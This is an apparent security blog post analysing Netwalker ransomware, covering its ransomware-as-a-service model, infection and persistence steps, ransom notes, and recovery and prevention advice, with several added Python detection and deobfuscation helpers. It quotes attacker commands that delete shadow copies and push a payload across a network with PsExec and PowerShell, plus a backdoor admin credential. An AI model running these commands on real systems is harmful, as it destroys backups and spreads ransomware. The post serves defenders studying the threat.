In the age of information technology, cybercriminals are developing advanced ransomware that employs sophisticated techniques to extort money — a development that constitutes a threat to everyone connected to the internet. Ransomware encrypts a victim’s files and demands a ransom for decrypting them. Ransomware attacks result in data loss and financial losses for individual users and companies, which may also suffer reputational damage. One of the latest ransomware types spreading across the world is Netwalker.
This blog post covers Netwalker and its attack methods and explains how to protect yourself against it.
What does ransomware mean? Ransomware is a type of malicious software that steals or encrypts files on an infected computer. It then demands that the victim pay a ransom to the attacker to decrypt the files and prevent stolen data from being leaked.
Cybersecurity researchers have reported that Netwalker was written in C++ by a group of Russian-speaking hackers.
It was first discovered sometime between late August and September 2019.
Netwalker is also referred to as Mailto or Koko.
The first known attacks were directed against a company in Australia and a medical company in the United States.
Netwalker compromises the network and encrypts all Windows devices connected to it using robust encryption algorithms with a near-zero probability of decryption. Netwalker operators also demand that victims pay ransoms in Bitcoin, and those ransoms are steep. If the victim balks at paying, the attackers threaten to make the stolen information public on the dark web, ratcheting up the pressure to pay.
The attackers rely on modern high-speed networks and internet connections that allow transferring large amounts of data in a short time and on encrypted network connections that are difficult to trace.
Investigators and security researchers found that the primary goal of Netwalker creators was to attack large organizations and agencies in developed countries. Netwalker attackers believe, and rightly so, that large companies have more cash than smaller ones. Downtime for large companies means higher financial losses than for smaller ones, thus making the chances higher that large companies would pay the ransoms. However, many ransomware attacks are still carried out against small companies and individual users.
Netwalker targets range across multiple industries and span the education, medical and government sectors. Netwalker attacks on healthcare organizations have already resulted in patients’ deaths because computers containing medical records and advanced medical equipment became unavailable once infected. Companies attacked by Netwalker have lost millions of dollars, while the attackers received more than USD 25 million in the first months of distributing the ransomware.
Over the past eight months, researchers have seen Netwalker transition to a ransomware-as-a-service (RaaS) delivery model, potentially opening up the platform to an increased number of enterprising cybercriminals. Currently, Netwalker operates as a closed-access RaaS portal. Under this model, Netwalker creators provide their partners, also skilled cybercriminals, with a customizable kit that makes it easier to launch attacks. These partners are granted access to the web portal hosted on the dark web, where they can design custom versions of the ransomware.
The dirty work is left to second-tier gangs, known as affiliates, who engage in the actual distribution of Netwalker and in the attacks on the victims. The shadowy group of creators also runs marketing campaigns and promotions on the dark web to recruit experienced hackers to launch attacks against large targets. Individuals with successful prior experience in hacking into business networks are preferred over rookies.
Before launching attacks, Netwalker operators usually perform due diligence on their targets, collecting such info as the name of the organization, revenue numbers, IP addresses, domain names, account names, antivirus software in use, and so on.
It is worth mentioning that the ransomware creators had imposed one significant restriction on the worm use — no attacks against Russia and its partners in the CIS (the Commonwealth of Independent States). However, Netwalker incidents were registered in those countries as well.
The creators used a packer and a unique compression format to prevent antivirus applications from detecting Netwalker. Antivirus programs assign different names to this worm once they detect it. Below is the list of Netwalker names previously identified by various antivirus applications:
Other: Malware-gen [Trj]
Trojan.PowerShell.Agent.GV
A Variant Of Generik.CMKGJSA
HEUR: Trojan.PowerShell.Generic
Trojan.Encoder.31707
Win64/Filecoder.Netwalker.A
PS/Netwalker.b
Virus.powershell.qexvmc.1
Trojan.Gen.NPE
Ransom:PowerShell/NetWalker!MTB
Trojan.PowerShell.Agent.GV
Hackers are real experts at making ransomware more harmful and more difficult to identify. In the most recent attacks, Netwalker employed exe or dll files — a development that makes it more difficult for antivirus programs to identify this particular worm. Signs that a system has been infected include the inability to open files and launch applications, changed file icons, altered file extensions, random system freezes and so on. If you notice a high load on your disk drives for no particular reason, it’s worth checking it out because ransomware can be in the process of encrypting your files at that very moment. If you see a ransom message, it means that the computer has been infected. Read on to learn how to defeat ransomware attacks.
A ransomware analysis reveals that the primary way for Netwalker to infect your Windows-based machines is by distributing executable files (EXE) across the network.
The worm can also gain access to an individual machine and then spread to the network through phishing attacks or spam emails with an attached VBScript. The Netwalker infection can be described as taking place in stages. Below we take a closer look at the entire process.
Netwalker infects computers by using multiple methods and entryways. Below are the most popular infection methods:
To launch Netwalker attacks, operators use a set of ransomware tools with broad functionality for gaining initial access, execution (including remote code execution), privilege escalation, defense evasion, credential access, network discovery, lateral movement and so on.
Netwalker-infected EXE files can have different names. File names made of random characters (usually HEX characters) with the EXE extension are popular, for example, a5df26c1.exe or qeSw.exe. However, an infected file may also carry an ordinary-looking name, such as WTVConverter.exe.
The following processes are launched upon the execution:
C:\Users\testuser\Desktop\a5df26c1.exe
C:\Windows\system32\explorer.exe
C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
\??\C:\Windows\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\notepad.exe "C:\Users\testuser\Desktop\A8DCE-Readme.txt"
As you can see, once Netwalker runs its EXE file, it deletes the shadow volume copies in silent mode to prevent the user from using built-in Windows recovery tools. Then conhost.exe connects to the Windows console application, -ForceV1, requesting the information directly from the OS kernel. Notepad is then used to write a readme file with ransomware instructions in various folders. A command to delete the shadow copies is executed using the original Explorer and the injected Explorer processes. In light of the above, machine/network users need to pay special attention to Explorer processes.
Netwalker operators also embrace sophisticated techniques to increase stealth and complicate causal analysis. One of those techniques used to inject the Netwalker payload into explorer.exe of the attacked OS is called Process Hollowing. It occurs when Netwalker creates a new explorer.exe process in a suspended state, then unmaps the process memory and replaces the actual process with the ransomware code. Once the malicious code injection has taken place, a new instance of the explorer.exe process that looks legitimate is spawned, and the original ransomware process is then killed. These tactics prevent a regular user from identifying the Netwalker process in Task Manager and Process Explorer.
One of the methods to determine whether the attackers have succeeded in injecting the Netwalker payload is checking for the presence of an unusual path belonging to the modified explorer.exe process. Such a modified process would be running as C:\Windows\SysWOW64\explorer.exe, while the legitimate explorer.exe process must run as C:\Windows\explorer.exe.
This change of path occurs if the executable file of Netwalker is 32-bit. A 32-bit version of Explorer in a 64-bit system runs in the SysWOW64 folder.
Once the above-outlined steps have been completed and the original executable file of Netwalker deleted, a new executable file is created in ...\AppData\Roaming\ in the user folder. For example:
C:\Users\testuser\AppData\Roaming\a5df26c1\a5df26c1.exe
There are several reasons for the malware to be placed in this particular folder. The AppData folder has the hidden attribute and is not visible to users who have not configured their system to display all files in Windows Explorer. Regular users normally do not need administrator permissions to write files in the AppData folder; they can write and execute files there with their own account. Netwalker creates new entries in the Windows registry to be invoked every time the infected computer boots.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\a5df26c1
HKLM\Software\a5df26c1\a5df26c1
After adding the keys to the Registry, Netwalker will run every time Windows starts.
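As an added illustration (not part of the original post), here is a Python check that walks a list of autostart registry values and flags the pattern just described: a Run value with a random-looking hex name pointing into AppData\Roaming, together with a companion HKLM\Software\<name> key holding a value of the same name. The sample values are constructed for the example; on a real host you would feed it an autostart or registry export.

```python
import re

# Constructed sample of autostart-related registry values as
# (key path, value name, value data). They mimic the Run-key pair described
# in the post and are not exported from a real host.
SAMPLE_VALUES = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "a5df26c1",
     r"C:\Users\testuser\AppData\Roaming\a5df26c1\a5df26c1.exe"),
    (r"HKLM\Software\a5df26c1", "a5df26c1", "<binary configuration blob>"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\testuser\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)
HEX_NAME = re.compile(r"^[0-9a-f]{4,16}$", re.IGNORECASE)  # heuristic: random hex label
ROAMING = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)
TOP_LEVEL_SOFTWARE_KEY = re.compile(r"^HK(?:LM|CU)\\Software\\([^\\]+)$", re.IGNORECASE)


def suspicious_autostarts(values):
    """Return (reason, key, name, data) tuples for entries matching the
    persistence pattern described in the post: a hex-named Run value pointing
    into AppData\\Roaming, plus a companion HK*\\Software\\<name> key that
    holds a value of the same name."""
    run_names = {name.lower() for key, name, _ in values if RUN_KEY.search(key)}
    hits = []
    for key, name, data in values:
        if RUN_KEY.search(key) and HEX_NAME.match(name) and ROAMING.search(data):
            hits.append(("run_key_roaming_hex", key, name, data))
        m = TOP_LEVEL_SOFTWARE_KEY.match(key)
        if m and m.group(1).lower() == name.lower() and name.lower() in run_names:
            hits.append(("companion_key", key, name, data))
    return hits


if __name__ == "__main__":
    for reason, key, name, data in suspicious_autostarts(SAMPLE_VALUES):
        print(f"{reason:22} {key}\\{name} = {data}")
```

The hex-name test is deliberately loose; treat a hit as something to look at, not as proof, and confirm by checking the file the value points to.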
Once the target organization’s network has been infiltrated, and at least one of the machines has been compromised, the attackers use a set of tools to gain lateral access to other computers on the network. User accounts with weak passwords, especially those with permissions for RDP access, and unpatched vulnerabilities serve as the gateways for escalating the attack. Hackers routinely employ various exploits, scanners, tools for brute force password cracking, antivirus removal tools, etc. One of the main targets during attacks is the Active Directory Domain Controller. There is evidence that Netwalker creates a Domain Admin account with the SQLSVC user name and gives it the password Br4pbr4p. The attackers then use the Domain Controller to execute Netwalker scripts on every reachable machine to replicate itself; for example, using psexec tool and certutil:
"psexec.exe \\host_name -d -c -f c:\programdata\rundl1.exe"
This command copies the payload across the entire network. If an earlier version is found, it is overwritten and run in stealth mode, without notifications or user input.
Specific extensions are defined in the embedded configuration file, and Netwalker will try to encrypt files with these extensions across local drives, accessible network shares as well as ‘hidden’ shares such as Admin$. It also defines the paths to be excluded from the encryption to maintain Windows OS functionality throughout the encryption process and, afterward, to demand the user to pay the ransom. The same configuration file also specifies what running processes must be killed.
Netwalker terminates running processes because it is designed to encrypt as many files as possible. If a file is in use by an active process, it cannot be modified or deleted. Any remaining running processes can hold files open, thus preventing them from being encrypted. For example, if a user is editing an XLS file in Microsoft Excel, the file cannot be deleted in Windows Explorer or via CMD (the command line) as long as it remains open. Netwalker uses the AES encryption algorithm to encrypt files.
Examples of file formats that are not encrypted:
exe, cmd, ps1, msi, etc.
Examples of excluded folders:
*\program files*\windows media**, *appdata*Microsoft*, **windows defender**, etc.
Examples of processes to be terminated:
outlook.exe, oracle.exe, winword.exe, excel.exe, synctime.exe, firefox.exe, etc.
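An added example, not from the original post: a small Python triage helper that applies the quoted exclusion lists to a list of file paths, the way a responder would when estimating which files on a disk image or share were in the ransomware's scope and which were skipped to keep Windows running. The configuration is built only from the examples quoted above (the post notes each list continues with "etc."), and the file paths are constructed.

```python
import fnmatch

# Constructed configuration built only from the examples quoted in the post;
# the real embedded configuration is longer.
NETWALKER_CONFIG = {
    "skip_extensions": {"exe", "cmd", "ps1", "msi"},
    "skip_folders": [r"*\program files*\windows media*",
                     r"*appdata*Microsoft*",
                     r"**windows defender**"],
}

# Constructed file list, as a responder might pull it from a disk image or a
# share inventory (including an administrative share).
SAMPLE_PATHS = [
    r"C:\Users\testuser\Documents\budget.xlsx",
    r"C:\Users\testuser\Desktop\tool.exe",
    r"C:\Users\testuser\Desktop\deploy.ps1",
    r"C:\Program Files\Windows Media Player\skins\default.wmz",
    r"C:\Users\testuser\AppData\Roaming\Microsoft\Word\recovery.asd",
    r"C:\ProgramData\Microsoft\Windows Defender\Scans\history.bin",
    r"\\fileserver\Admin$\config.xml",
    r"\\fileserver\finance\q3-report.docx",
]


def classify_path(path, config):
    """Return 'excluded:folder', 'excluded:extension' or 'in_scope' for one path.
    Folder globs are matched case-insensitively over the whole path, so '*'
    crosses directory separators, which is what a pattern such as
    '*appdata*Microsoft*' relies on."""
    lowered = path.lower()
    for pattern in config["skip_folders"]:
        if fnmatch.fnmatchcase(lowered, pattern.lower()):
            return "excluded:folder"
    name = lowered.rsplit("\\", 1)[-1]
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if ext in config["skip_extensions"]:
        return "excluded:extension"
    return "in_scope"


def classify_paths(paths, config):
    return {p: classify_path(p, config) for p in paths}


def summarize(paths, config):
    """Count paths per verdict; a quick estimate of the recovery workload."""
    counts = {}
    for verdict in classify_paths(paths, config).values():
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


if __name__ == "__main__":
    for path, verdict in classify_paths(SAMPLE_PATHS, NETWALKER_CONFIG).items():
        print(f"{verdict:19} {path}")
    print(summarize(SAMPLE_PATHS, NETWALKER_CONFIG))
```

Note that a file on the Admin$ share is in scope exactly as the post describes, while files under the Windows Defender and AppData\Microsoft trees are left alone so the system keeps running long enough to show the ransom note.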
A ransom note is usually created as a text file located in the directories that contain the encrypted files.
Hi!
Your files are encrypted.
All encrypted files for this computer have extension: .a5df26c1
---
… Explanation text
---
Contact us
Don’t forget to include your code in the email:
unique_long_code
Here are some of the email addresses used to send ransom notes to victims of Netwalker:
[email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected].
Ransomware analysis has identified strings related to the ransom note template after analyzing a payload in an infected computer's memory. It has shown that an obfuscation technique is typically used, and the text is encoded by using BASE64*.
*Note: BASE64 is a binary-to-text encoding scheme that represents binary data in the text format (ASCII).
---
Contact us:
1.{mail1}
2.{mail2}
Don’t forget to include your code in the email:
{code}
As you can see, email addresses and a unique code are set as variables.
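As an added example (not code from the original post), the following Python turns a Base64-encoded template with {mail1}, {mail2} and {code} placeholders back into a regular expression and uses it to pull the contact addresses and the victim code out of a rendered note, which is how an analyst would extract indicators from notes collected across an estate. The template and note are constructed, the addresses use the reserved example.invalid domain, and the Base64 string is produced from the plaintext here rather than taken from a memory dump.

```python
import base64
import re

# Constructed template in the layout quoted in the post. In a real case the
# Base64 string comes from the payload's memory; here it is produced from the
# plaintext so the example runs offline.
TEMPLATE_TEXT = (
    "---\n"
    "Contact us:\n"
    "1.{mail1}\n"
    "2.{mail2}\n"
    "Don't forget to include your code in the email:\n"
    "{code}\n"
)
TEMPLATE_B64 = base64.b64encode(TEMPLATE_TEXT.encode("utf-8")).decode("ascii")

# Constructed rendered note, as it might be found on an encrypted host.
SAMPLE_NOTE = (
    "---\n"
    "Contact us:\n"
    "1.support1@example.invalid\n"
    "2.support2@example.invalid\n"
    "Don't forget to include your code in the email:\n"
    "CONSTRUCTED0123456789\n"
)

PLACEHOLDER = re.compile(r"\{(\w+)\}")


def decode_template(b64):
    """Reverse the Base64 layer to get the plaintext template."""
    return base64.b64decode(b64).decode("utf-8")


def find_placeholders(template):
    """List the variable names the template expects, in order."""
    return PLACEHOLDER.findall(template)


def template_to_regex(template):
    """Escape the literal text and turn each {name} into a named group."""
    parts, pos = [], 0
    for m in PLACEHOLDER.finditer(template):
        parts.append(re.escape(template[pos:m.start()]))
        parts.append(f"(?P<{m.group(1)}>.+?)")
        pos = m.end()
    parts.append(re.escape(template[pos:]))
    return re.compile("^" + "".join(parts) + "$", re.DOTALL)


def extract_indicators(note, template):
    """Pull the placeholder values (contact addresses, victim code) out of a
    rendered note; None if the note does not follow the template."""
    m = template_to_regex(template).match(note)
    return m.groupdict() if m else None


if __name__ == "__main__":
    template = decode_template(TEMPLATE_B64)
    print(find_placeholders(template))
    print(extract_indicators(SAMPLE_NOTE, template))
```

Because the regular expression is generated from the template, the same code keeps working when a later build changes the wording, as long as the new template is decoded from the sample first.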
In later modifications of Netwalker, instead of sending emails, the note urges the victim to visit a webchat (some_hash_string.onion) located on the Tor network and insert the unique code in the appropriate field of the web interface.
Before starting the file encryption, Netwalker scans all available drives and network resources, attempting to locate backup images. It starts to encrypt any backup images it finds after beginning the encryption of the compromised machine. Such a sequence gives the affected user a window of opportunity, allowing them to interrupt the encryption and save at least some of the files. Suppose the user opens the note when Netwalker has already encrypted some but not all of the files. In that case, the user may see a scary-looking message demanding that the machine not be powered off while file encryption is in progress. It is recommended not to wait until all files are encrypted. You should power off the infected computer immediately. Then you can boot from live rescue media (that has write protection, such as a DVD or SD flash card) and delete the malware files using antivirus software. In this case, you might be able to rescue files that have not yet been encrypted.
Another way to distribute Netwalker and infect computers is by email. Spam and phishing emails contain macros with malicious VBScripts (Visual Basic Scripting). With the COVID-19 pandemic, Netwalker attacks came back with a vengeance. Organized gangs of cybercriminals are exploiting the public’s anxiety over the COVID-19 spread to launch phishing attacks by making them look like messages with important information or updates about COVID-19. Such emails ask potential victims to open the attached file to get the full details.
Once the harmful attachment (usually a Word or Excel document in the DOCX or XLSX formats) is opened, a VBScript is activated and infects the computer.
C:\Windows\system32\WScript.exe C:\Users\testuser\Desktop\CORONAVIRUS_COVID-19.vbs
Once activated, the behavior of Netwalker ransomware distributed via email is similar to the edition distributed as EXE files. In particular, new keys are added to the Windows registry, so Netwalker can ensure persistence and run on every system boot: HKLM/Software/ and HKCU/Software/
Volume shadow copies are deleted.
C:\Windows\system32\vssadmin.exe delete shadows /all /quiet
A PowerShell loader script is an alternative way to infect computers. In this case, the attackers use multiple layers of obfuscation techniques to hide malicious scripts from antivirus applications, users, and researchers. One such method involves using BASE64 encoding and one-byte XOR algorithms to encrypt a script as massive two-byte arrays. Because of its ability to employ PowerShell scripts and perform DLL injection into running processes instead of using traditional executable files to infect computers, some call it “fileless ransomware”.
Two DLL files, for 32-bit and 64-bit Windows versions, are encoded in the byte array of the PowerShell script. The correct version is selected depending on the target operating system, then reflective DLL injection into explorer.exe is performed after resolving the needed API addresses from kernel32.dll. SHA256, CRC32 and RC4 KSA algorithms are used to encrypt the Netwalker malware configuration.
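The layering described above can be undone by an analyst without knowing the XOR key, because the embedded DLLs begin with a predictable PE header. Here is an added Python example (not from the original post) that Base64-decodes a blob, recovers a single-byte XOR key by testing which key yields an "MZ" header whose e_lfanew points at a valid "PE\0\0" signature, and reads the COFF Machine field to tell the 32-bit DLL from the 64-bit one. The obfuscated sample is constructed in the script from a minimal fake PE header with key 0x5A; the order of the layers (XOR inside, Base64 outside) is an assumption, as the post does not state it.

```python
import base64
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C    # real PE constants from the COFF header
IMAGE_FILE_MACHINE_AMD64 = 0x8664


def build_fake_pe(machine):
    """Constructed stand-in for an embedded DLL: a DOS header whose e_lfanew
    (offset 0x3C) points at a PE signature followed by the Machine field.
    It is not a loadable image, just enough structure for the checks below."""
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = b"PE\x00\x00" + struct.pack("<H", machine) + b"\x00" * 18
    stub_text = b"This program cannot be run in DOS mode.\r\n"
    return dos_header + coff + stub_text


def xor_bytes(data, key):
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)


# Constructed obfuscated sample: XOR with key 0x5A, then Base64 (assumed order).
SAMPLE_KEY = 0x5A
SAMPLE_B64 = base64.b64encode(
    xor_bytes(build_fake_pe(IMAGE_FILE_MACHINE_AMD64), SAMPLE_KEY)).decode("ascii")


def pe_machine(data):
    """Read Machine from the COFF header; returns 'x86', 'x64' or None when the
    bytes do not form a consistent PE header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}.get(machine)


def recover_xor_key(blob):
    """Try every single-byte key; keep the one that yields 'MZ' and a PE header."""
    if len(blob) < 2:
        return None
    for key in range(256):
        if blob[0] ^ key != 0x4D or blob[1] ^ key != 0x5A:  # 'M', 'Z'
            continue
        if pe_machine(xor_bytes(blob, key)) is not None:
            return key
    return None


def deobfuscate(b64_text):
    """Strip Base64, recover the XOR key, and return (key, architecture, bytes)."""
    blob = base64.b64decode(b64_text)
    key = recover_xor_key(blob)
    if key is None:
        raise ValueError("no single-byte XOR key produces a PE header")
    data = xor_bytes(blob, key)
    return key, pe_machine(data), data


if __name__ == "__main__":
    key, arch, data = deobfuscate(SAMPLE_B64)
    print(f"key=0x{key:02X} arch={arch} size={len(data)}")
```

The same known-plaintext idea carries over to the real loader: whatever encoding wraps the byte array, the two candidate DLLs must decode to something starting with a DOS header, so an analyst can verify a candidate key against that structure instead of trusting the script's own decoding routine.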
Having gained access to the network, the attack operators can then launch a PowerShell batch to spread ransomware to all the available devices on the network.
An example is shown below.
for /f %%G IN (%INPUT_FILE%) DO PsExec.exe -d \\%%G powershell -ExecutionPolicy Bypass -NoProfile -NoLogo -NoExit -File \\{redacted}\Users\{redacted}\{redacted}.ps1
As a result, the Netwalker payload is delivered and executed across the entire network. The whole process is highly automated.
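To tie the process chains quoted in this post together (the vssadmin and notepad launches from the EXE, the injected Explorer running from SysWOW64, the WScript launch of a .vbs from a user profile, and the PsExec-driven PowerShell with -ExecutionPolicy Bypass reading a script from a UNC path), here is an added Python example, not from the original post, that runs a handful of detection rules over process-creation events and walks parent PIDs to reconstruct a chain. The events are constructed to mirror the post's examples; the field names follow Sysmon Event ID 1 as an assumption, the PSEXESVC parent reflects how PsExec runs commands on a remote host, and the hex-name rule is only a heuristic.

```python
import re

# Constructed process-creation records (pid, ppid, image, cmdline), shaped
# like Sysmon Event ID 1 fields. They replay the chains quoted in the post
# and do not come from a real host.
EVENTS = [
    {"pid": 50,  "ppid": 4,   "image": r"C:\Windows\PSEXESVC.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"pid": 100, "ppid": 60,  "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\testuser\Desktop\a5df26c1.exe",
     "cmdline": r"C:\Users\testuser\Desktop\a5df26c1.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\system32\vssadmin.exe",
     "cmdline": r"C:\Windows\system32\vssadmin.exe delete shadows /all /quiet"},
    {"pid": 600, "ppid": 300, "image": r"C:\Windows\system32\notepad.exe",
     "cmdline": r'C:\Windows\system32\notepad.exe "C:\Users\testuser\Desktop\A8DCE-Readme.txt"'},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\system32\WScript.exe",
     "cmdline": r"C:\Windows\system32\WScript.exe C:\Users\testuser\Desktop\CORONAVIRUS_COVID-19.vbs"},
    {"pid": 800, "ppid": 50,  "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -NoProfile -NoLogo -NoExit -File \\fileserver\Users\share\loader.ps1"},
    {"pid": 900, "ppid": 100, "image": r"C:\Windows\system32\notepad.exe",
     "cmdline": r"C:\Windows\system32\notepad.exe C:\Users\testuser\notes.txt"},
]


def _base(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def _search(pattern, text):
    return re.search(pattern, text, re.IGNORECASE) is not None


# Each rule: (name, predicate over one event). Kept deliberately narrow so a
# benign notepad or the real Explorer does not fire.
RULES = [
    ("hex_named_exe_user_profile",           # random hex name under \Users (heuristic)
     lambda e: _search(r"\\users\\.*\\[0-9a-f]{4,16}\.exe$", e["image"])),
    ("explorer_unexpected_path",             # legitimate Explorer is C:\Windows\explorer.exe
     lambda e: _base(e["image"]) == "explorer.exe"
     and e["image"].lower() != r"c:\windows\explorer.exe"),
    ("shadow_copy_deletion",
     lambda e: _base(e["image"]) == "vssadmin.exe"
     and _search(r"delete\s+shadows", e["cmdline"])),
    ("ransom_note_opened",
     lambda e: _base(e["image"]) == "notepad.exe"
     and _search(r"-readme\.txt", e["cmdline"])),
    ("script_host_user_vbs",
     lambda e: _base(e["image"]) in ("wscript.exe", "cscript.exe")
     and _search(r"\\users\\.*\.vbs\b", e["cmdline"])),
    ("powershell_bypass_unc_script",
     lambda e: _base(e["image"]) == "powershell.exe"
     and _search(r"-executionpolicy\s+bypass", e["cmdline"])
     and _search(r"-file\s+\\\\", e["cmdline"])),
]


def scan_events(events):
    """Return (pid, rule name) for every rule that fires, in event order."""
    return [(e["pid"], name) for e in events for name, pred in RULES if pred(e)]


def ancestry(events, pid):
    """Walk parent PIDs to list the image names from a process up to the root
    we have records for; shows the injected Explorer sitting above vssadmin."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_base(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for pid, rule in scan_events(EVENTS):
        print(f"pid {pid:4}  {rule:30}  chain: {' <- '.join(ancestry(EVENTS, pid))}")
```

The ancestry walk is what turns individual hits into a story: the shadow-copy deletion is worth far more attention when its parent is an Explorer running from SysWOW64 whose own parent is a hex-named file on a user's desktop.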
Cybercriminals update their “product” before launching new attacks, so some Netwalker features and working principles may change. However, understanding how Netwalker ransomware attacks are carried out helps you protect your data against them.
Disconnect all infected computers from the network immediately. If the computer is connected to the network via an Ethernet connection, physically unplug the cable. Suppose the infected computer is connected to a Wi-Fi network. In that case, you need to power off the access point because the network management function may not work correctly on the infected computer.
Power off all infected computers. Consider shutting down all machines because they might be already infected, but their files may not have been encrypted yet.
Do NOT pay the ransom! Doing so perpetuates ransomware attacks! Besides, there is no guarantee that your files will be recovered. Remember that ransomware gangs attack hospitals, power plants and other critical infrastructure. The operation of these organizations is essential to society’s functioning, and any interruption may cause human deaths. Don’t sponsor criminals!
Prepare a rescue medium, either a DVD or a USB flash drive, or write a bootable image to an SD card as an alternative. This media must be read-only to avoid infection when it is inserted into the infected computer.
Boot from the rescue medium and remove the ransomware. You can pack Netwalker files into an archive protected with a password and send it to a digital lab specializing in ransomware analysis.
Create an image of the disks containing encrypted/corrupted files, and save the image to an external disk. You may need it later for further analysis and data recovery.
Take steps to recover deleted files by using software for the recovery of deleted files. You might be able to recover some files if the disk has not been overwritten or erased by the ransomware writing zeroes or random bits. Copy the recovered files to an external disk.
If you have a backup, recover the data from that backup. Make sure that you have deleted harmful files and that your computers are no longer infected before starting the recovery. Consider erasing the infected disks and starting full recovery because viruses can leave behind security holes or other backdoor exploits that can be activated later.
Change passwords on each affected computer. In the aftermath of an attack, we recommend changing all other passwords in your organization, including passwords for wireless networks and email accounts, etc.
Inform the authorities about the Netwalker ransomware attacks against you and your company.
The most effective strategy to prevent Netwalker ransomware attacks is twofold: having a security policy in place and performing scheduled
Here are some recommendations:
Install security patches and updates to the operating system and other applications regularly. You can configure your system to perform automatic updates.
Configure a firewall properly on your routers. Don’t leave open ports for unused services. Change standard port numbers to custom ones, if possible. Consider using port knocking.
Use strong and different passwords for all user accounts. Don’t save passwords as plain text or write on stickers and place them on monitors or other objects that can be seen by others.
Install antivirus/antimalware software on all your machines. The software must update virus signature databases regularly and always be up to date.
Configure email filters on email servers or email gateways to reject spam and suspicious emails. Take advantage of email filtering and protection capabilities of cloud email providers. For example, if you use Microsoft 365 with Outlook 365 and Exchange Online, you can use Exchange Online Protection and Advanced Threat Protection.
Network segmentation helps to limit the spread of viruses if a machine connected to the network becomes infected.
Wireless networks are more vulnerable compared to wired ones. Opt for wired networks instead.
Consider using two-factor authentication where possible.
You also need to make sure your users comply with the company’s security policy! Educate them about social engineering hacks, malicious phishing attachments and other security risks. Users should be trained to notify system administrators if they observe suspicious activities on their computers or receive email messages that look questionable.
If you happen to find a DVD disc, USB flash drive, flashcard, or other media near your office, don’t insert it into a working computer. In this case, notify users about the find and ask them to inform your system administrator. An attacker can plant an innocent-looking media near your office. This media can be configured to run a ransomware installer automatically to infect your computer and other machines on the network. A system administrator can use a machine not connected to the network, running a Linux operating system (or boot from a Linux live DVD) to examine the found media. If any malicious files are found, there is a good chance that a cyber-attack against your organization is in progress. In this case, you need to install the latest security patches, ensure that your antivirus software is up-to-date and running on all computers, make fresh backups and notify the management and users about the break-in attempt.
Configure data backups and perform them regularly. Make sure the backup repositories are not shared or accessible to other users on your network. Disconnecting your backup repositories after the backup job is finished is a good idea. You can use DVDs or Blu-ray discs to write data backups that cannot be erased. Consider using tape cartridges to prevent your data backups from being erased or encrypted by ransomware.
Your organization should enforce data backup and security policies equally. Keep in mind that even if you had your data backed up before a Netwalker attack and were able to recover it, the attackers can still leak private data that was stolen before it was encrypted by Netwalker. That’s why you should implement security measures to thwart potential attacks.
The stakes are high. The latest ransomware attacks show that ransomware is here to stay, and their incident numbers are on the rise. Netwalker ransomware attacks pose a clear and present danger that may result in human deaths and significant financial losses. Netwalker operators can steal data and publish it on the dark web. Leaked sensitive data is always a high-risk situation and can have a significant negative impact on business. Netwalker encrypts data on infected computers by using robust encryption algorithms that make it impossible to decrypt it.
The strategy to protect your network against Netwalker ransomware attacks requires organizations to have in place and enforce a viable security policy to reduce the likelihood of being infected and configure and perform regular data backups to enable quick recovery in the event of an attack.